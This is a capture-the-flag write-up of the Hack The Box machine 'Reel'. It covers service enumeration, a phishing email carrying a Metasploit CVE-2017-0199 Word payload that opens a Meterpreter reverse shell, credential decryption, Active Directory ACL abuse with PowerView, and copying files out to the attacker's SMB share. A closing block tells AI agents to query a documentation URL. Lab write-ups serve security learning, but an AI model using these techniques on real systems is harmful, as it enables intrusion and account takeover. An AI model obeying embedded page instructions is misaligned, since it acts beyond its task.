# HTB - Reel
## Machine Info
Reel is medium to hard difficulty machine, which requires a client-side attack to bypass the perimeter and highlights a technique for gaining privileges in an Active Directory environment.
## Enumeration
**Scope**
> IP Address: 10.10.10.77
**Nmap Scan**
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
25/tcp open smtp syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18 12:19AM documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2024-07-12T12:48:32+01:00
| smb2-time:
| date: 2024-07-12T11:48:30
|_ start_date: 2024-07-12T11:40:43
|_clock-skew: mean: -19m53s, deviation: 34m36s, median: 4s
```
```
* Open ports: 21,22,25,135,139,445
* Services: FTP - SSH - SMTP - RPC - SMB
* Versions: Windows Server 2012 R2 Standard 9600 - OpenSSH 7.6
* Important Notes: FQDN: REEL.HTB.LOCAL - Domain name: HTB.LOCAL - Anonymous FTP login allowed
```
**FTP Enumeration**
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip
FINISHED --2024-07-12 07:48:01--
Total wall clock time: 3.0s
Downloaded: 5 files, 17K in 0.2s (75.3 KB/s)
```
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ls
10.10.10.77 Nmap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ tree 10.10.10.77
10.10.10.77
└── documents
├── AppLocker.docx
├── Windows Event Forwarding.docx
└── readme.txt
```
I downloaded these files but I found nothing interesting inside them. except the email address of the creator of these files `nico@megabank.com`
**RPC Enumeration**
No data from `rpcclient`
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ rpcclient -U "%" $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
```
**SMB Enumeration**
I can't list the shares with `cme` or `smbclient`
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ smbclient -N -L //$ip
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.77 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.77 445 REEL [*] Windows Server 2012 R2 Standard 9600 x64 (name:REEL) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB 10.10.10.77 445 REEL [+] HTB.LOCAL\:
SMB 10.10.10.77 445 REEL [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ crackmapexec smb $ip -u 'guest' -p '' --shares
SMB 10.10.10.77 445 REEL [*] Windows Server 2012 R2 Standard 9600 x64 (name:REEL) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB 10.10.10.77 445 REEL [-] HTB.LOCAL\guest: STATUS_ACCOUNT_DISABLED
```
**SMTP Enumeration**
I always scan for `open-relay` if I found `SMTP` server to check for the possibility of sending arbitrary emails that can be used for phishing.
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ nmap -p25 --script smtp-open-relay $ip -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-12 08:05 EDT
Nmap scan report for 10.10.10.77
Host is up (0.068s latency).
PORT STATE SERVICE
25/tcp open smtp
|_smtp-open-relay: Server is an open relay (8/16 tests)
```
## Initial Access
### Shell as nico
I got a hint from community that there is a CVE affects Microsoft office that allow RCE via phishing emails. `CVE-2017–0199`
since we can send arbitrary emails as smtp server is `Open relay,` we can craft a payload and send it via smtp server to get remote code execution
There is a Metasploit module that can generate the malicious payload we want to send
```bash
msf6 > search CVE-2017-0199
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/fileformat/office_word_hta 2017-04-14 excellent No Microsoft Office Word Malicious Hta Execution
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/office_word_hta) > options
Module options (exploit/windows/fileformat/office_word_hta):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local mac
hine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH default.hta yes The URI to use for the HTA file
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Office Word
msf6 exploit(windows/fileformat/office_word_hta) > set srvhost tun0
msf6 exploit(windows/fileformat/office_word_hta) > set srvport 80
msf6 exploit(windows/fileformat/office_word_hta) > set lhost tun0
msf6 exploit(windows/fileformat/office_word_hta) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.16.7:4444
msf6 exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /home/kali/.msf4/local/msf.doc
[*] Using URL: http://10.10.16.7/default.hta
[*] Server started.
```
Send email to the user we found with `sendEmail` command with the attachment generated from Metasploit
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ sendemail -t nico@megabank.com -f blind@htb.com -u 'Are you Reel!!!' -m "Click me" -a /home/kali/.msf4/local/msf.doc -s $ip
Jul 12 11:27:25 kali sendemail[77146]: Email was sent successfully!
```
At Metasploit, I got a connection back as `nico` user
```bash
[*] Sending stage (176198 bytes) to 10.10.10.77
[*] Meterpreter session 1 opened (10.10.16.7:4444 -> 10.10.10.77:58083) at 2024-07-12 11:27:45 -0400
msf6 exploit(windows/fileformat/office_word_hta) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: HTB\nico
```
Get the flag from user's desktop
```bash
meterpreter > shell
Process 3524 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\nico
C:\Users\nico>type Desktop\user.txt
4b1fa88985d787becfxxxxxxxxxxxxxx
```
> User Flag: 4b1fa88985d787becfxxxxxxxxxxxxxx
## Privilege Escalation
### **Shell as Tom**
```powershell
C:\Users\nico>tree /F
Folder PATH listing
Volume serial number is FFFFFFB9 CEBA:B613
C:.
Contacts
Desktop
cred.xml
user.txt
```
It's a PowerShell credential file
We can decrypt these credentials with `Cli-xml` native tool
```PowerShell
C:\Users\nico>PowerShell -c "$credentials= Import-Clixml -Path C:\Users\nico\Desktop\cred.xml; $credentials.GetNetworkCredential().username; $credentials.GetNetworkCredential().password"
Tom
1ts-mag1c!!!
```
We don't have any remote access solution to the machine except `ssh`, Let's try to authenticate with tom with ssh
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ssh tom@$ip
tom@10.10.10.77's password:
tom@REEL C:\Users\tom>
```
There are multiple interesting files in the tom's home directory, I will explore them
```powershell
tom@REEL C:\Users\tom>tree /F
C:.
├───Contacts
├───Desktop
│ └───AD Audit
│ │ note.txt
│ │
│ └───BloodHound
│ │ PowerView.ps1
│ │
│ └───Ingestors
│ acls.csv
│ BloodHound.bin
│ BloodHound_Old.ps1
│ SharpHound.exe
│ SharpHound.ps1
```
`Note.txt`
```PowerShell
tom@REEL C:\Users\tom>type "Desktop\AD Audit\note.txt"
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.
```
The other files are `PowerView.ps1` which can be used to enumerate AD Environment and exploit misconfiguration, `Sharphound.exe` is the Ingestor of `bloodhound` that collect information about the domain.
The most interesting file is `acls.csv`, I will copy it to my kali machine after starting local smb server
```bash
tom@REEL C:\Users\tom>net use n: \\10.10.16.7\share /user:blind0bandit blind0bandit
The command completed successfully.
tom@REEL C:\Users\tom>copy "Desktop\AD Audit\BloodHound\Ingestors\acls.csv" n:
1 file(s) copied.
```
I opened the file and start to explore it manually as I tried to upload it to bloodhound, but it failed for me.
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ open acls.csv
```
* Searching for the user tom, I found the following:
* user tom has `WriteOwner` on user `claire`
* user `claire` has `WriteDacl` on group `backup_admins`
* It's a potential path we can take to takeover `claire` account then authenticate with this account and modify the ACLs of `backup_admins` group to be able to add ourselves in that group which seems to be high privileges group
* Using `PowerView.ps1` already exists on the machine can be useful to execute this attack path
### **Shell as Claire**
Abuse `WriteOwner` to get ownership of `claire` user to be able to modify its access control and get the privileges to change its password
```powershell
set-domainobjectowner -Identity claire -OwnerIdentity tom
add-domainobjectacl -TargetIdentity claire -PrincipalIdentity tom -Rights Resetpassword
```
Change password of `claire` user
```powershell
$pass = ConvertTo-SecureString 'P@ssword123!' -AsPlainText -Force
set-domainuserpassword -identity claire -accountpassword $pass
```
abuse `WriteDacl` to add `GenericAll` right to user `cliare` on group `backup_admins` so I have full control on that group
```powershell
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "Backup_admins" -PrincipalIdentity "htb.local\claire"
```
ssh with `claire` and add me to the target group
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ssh claire@$ip
claire@10.10.10.77's password:
claire@REEL C:\Users\claire>
```
```PowerShell
net group "backup_admins" claire /add
```
> you must logout and login in again for the changes to take effect and be fast, too :)
`backup_admins` group has Full access on `Administrator` Folder from the output of `icacls` below
```powershell
claire@REEL C:\Users>icacls Administrator
Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
HTB\Backup_Admins:(OI)(CI)(F)
HTB\Administrator:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
Successfully processed 1 files; Failed processing 0 files
```
I tried to get the flag but it seems I don't have access to
```powershell
claire@REEL C:\Users\Administrator>type Desktop\root.txt
Access is denied.
```
### **Shell as administrator**
Exploring `administrator` home directory shows several `.ps1` scripts
```PowerShell
claire@REEL C:\Users\Administrator>tree /F
├───Desktop
│ │ root.txt
│ │
│ └───Backup Scripts
│ backup.ps1
│ backup1.ps1
│ BackupScript.ps1
│ BackupScript.zip
│ folders-system-state.txt
│ test2.ps1.txt
```
I found the admin password on one of these files
```PowerShell
claire@REEL C:\Users\Administrator>type "Desktop\Backup Scripts\BackupScript.ps1"
# admin password
$password="Cr4ckMexxxxxxxxx"
```
And we have a shell as admin
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ssh administrator@$ip
administrator@10.10.10.77's password:
administrator@REEL C:\Users\Administrator>type Desktop\root.txt
e622958df7390059522xxxxxxxxxxxxxx
```
> Root Flag: e622958df7390059522xxxxxxxxxxxxxx
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://blind0bandit.gitbook.io/blog/windows-machines/hard/htb-reel.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.